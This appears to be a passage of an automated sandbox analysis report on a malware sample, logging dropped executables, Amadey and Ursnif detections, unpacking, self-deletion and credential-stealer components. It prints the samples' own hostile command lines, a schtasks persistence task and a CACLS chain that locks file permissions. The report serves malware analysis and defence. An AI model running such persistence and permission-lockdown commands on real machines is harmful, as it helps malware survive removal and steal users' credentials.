Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\453D.exe C:\Users\user\AppData\Local\Temp\453D.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\59FE.exe C:\Users\user\AppData\Local\Temp\59FE.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6644.exe C:\Users\user\AppData\Local\Temp\6644.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6CEC.exe C:\Users\user\AppData\Local\Temp\6CEC.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\816F.exe C:\Users\user\AppData\Local\Temp\816F.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\explorer.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\explorer.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\explorer.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2B4A.tmp Jump to behavior
Source: 86EE.exe, 0000002D.00000003.493869220.00000000273B2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.492502087.00000000273B2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE offer_eligible_instrument ( offer_id UNSIGNED LONG,instrument_id UNSIGNED LONG),;' 4;'*
Source: 86EE.exe, 0000002D.00000003.490197880.00000000273B4000.00000004.00000800.00020000.00000000.sdmp, 95786452850497366982696300.45.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\816F.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B48AD6 CreateToolhelp32Snapshot,Module32First, 11_2_00B48AD6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\E3ECD25DF9
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Command line argument: 08A 12_2_00413780
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs Cryptographic APIs: 'CreateDecryptor'
Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\lulubob99\yu.pdb source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 3790.exe, 0000000D.00000002.412472703.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, 3790.exe, 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, 3790.exe, 0000000D.00000003.404528480.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.520940016.0000000000400000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
Source: Binary string: /.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ?C:\lulubob99\yu.pdbQ source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source: Binary string: _.pdb source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\android.annotation.TestApi.module1 - Copy.pdb source: 816F.exe, 0000001A.00000000.437232628.0000000000192000.00000002.00000001.01000000.00000011.sdmp, 816F.exe.1.dr
Source: Binary string: (P&gHC:\Windows\System.ServiceModel.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\tahaf\to.pdbQ source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source: Binary string: C:\tahaf\to.pdb source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source: Binary string: SC:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source: Binary string: C:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source: Binary string: @C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Unpacked PE file: 12.2.2B4A.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3790.exe Unpacked PE file: 13.2.3790.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Unpacked PE file: 15.2.rovwer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6644.exe Unpacked PE file: 19.2.6644.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Unpacked PE file: 0.2.S2XJ2wbz7u.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\tiddsjj Unpacked PE file: 11.2.tiddsjj.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Unpacked PE file: 12.2.2B4A.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\3790.exe Unpacked PE file: 13.2.3790.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Unpacked PE file: 15.2.rovwer.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\6644.exe Unpacked PE file: 19.2.6644.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
.NET source code contains potential unpacker
Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/SpecialNameAttributeSByteArrayTypeInfo.cs .Net Code: IIDIEnumSTOREDEPLOYMENTMETADATAPROPERTYsetNextActivator System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/SpecialNameAttributeSByteArrayTypeInfo.cs .Net Code: IIDIEnumSTOREDEPLOYMENTMETADATAPROPERTYsetNextActivator System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00401268 push cs; iretd 0_2_00401269
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00402B84 push esp; iretd 0_2_00402B85
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040CE34 pushad ; iretd 0_2_0040CE37
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00412698 push ss; ret 0_2_00412699
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040CF10 push edi; iretd 0_2_0040CF11
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00401268 push cs; iretd 11_2_00401269
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00402B84 push esp; iretd 11_2_00402B85
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040CE34 pushad ; iretd 11_2_0040CE37
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00412698 push ss; ret 11_2_00412699
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040CF10 push edi; iretd 11_2_0040CF11
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_009312CF push cs; iretd 11_2_009312D0
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00931790 push 81396969h; iretd 11_2_00931797
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B4F02F push edi; ret 11_2_00B4F036
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B4EE1A push edx; retf 11_2_00B4EE1B
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B4BA58 push es; retf 11_2_00B4BA5A
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0041C40C push cs; iretd 12_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00407CE6 push 8B0041E4h; retf 12_2_00407CF1
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0041C50E push cs; iretd 12_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040E21D push ecx; ret 12_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0041C6BE push ebx; ret 12_2_0041C6BF
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
PE file contains sections with non-standard names
Source: 59FE.exe.1.dr Static PE information: section name: _RDATA
PE file contains an invalid checksum
Source: 86EE.exe.1.dr Static PE information: real checksum: 0xae41 should be: 0x5a5ca
Source: cred64[1].dll.15.dr Static PE information: real checksum: 0x0 should be: 0x26b56
Source: 59FE.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x31822d
Source: cred64.dll.15.dr Static PE information: real checksum: 0x0 should be: 0x26b56
Source: 8C00.exe.1.dr Static PE information: real checksum: 0xae41 should be: 0x5a5ca
Source: initial sample Static PE information: section name: .text entropy: 7.881559830047924

Persistence and Installation Behavior
barindex
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tiddsjj Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\59FE.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\86EE.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\453D.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3790.exe File created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6644.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2B4A.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File created: C:\Users\user\AppData\Roaming\PingboardCache\argq.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\816F.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8C00.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tiddsjj Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6CEC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3790.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\s2xj2wbz7u.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\tiddsjj:Zone.Identifier read attributes | delete Jump to behavior
Uses cacls to modify the permissions of files
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
